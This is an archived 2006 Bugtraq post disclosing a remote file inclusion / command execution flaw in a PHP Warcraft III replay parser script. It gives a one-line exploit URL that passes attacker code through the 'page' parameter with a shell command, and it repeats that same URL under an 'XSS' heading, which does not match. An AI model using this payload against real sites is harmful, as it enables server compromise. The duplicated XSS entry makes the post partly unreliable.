[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Warcraft III Replay Parser Script Remote Command Exucetion
From:       botan () linuxmail ! org
Date:       2006-03-31 19:34:40
Message-ID: 20060331193440.19125.qmail () securityfocus ! com
[Download RAW message or body]

Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c 

Description :

Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that \
Warcraft III replay files (*.w3g) have much information inside. Almost everything can \
be pulled out of them: players accounts, races, colours, heroes and units made by \
each player, chat log and many more. If you are a webmaster of Warcraft III replay \
site or clan page you know how boring adding new replays can be without automation. \
This PHP script helps you provide as much information about replays on your site as \
possible without all the hard work. * 

I. Remote Command Exucetion ..

Yolumuz agitlerin yoludur.!

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

2.XSS Attacking

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

Solution : up version :)

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

14'ler Ölümsüzdür.


[prev in list] [next in list] [prev in thread] [next in thread]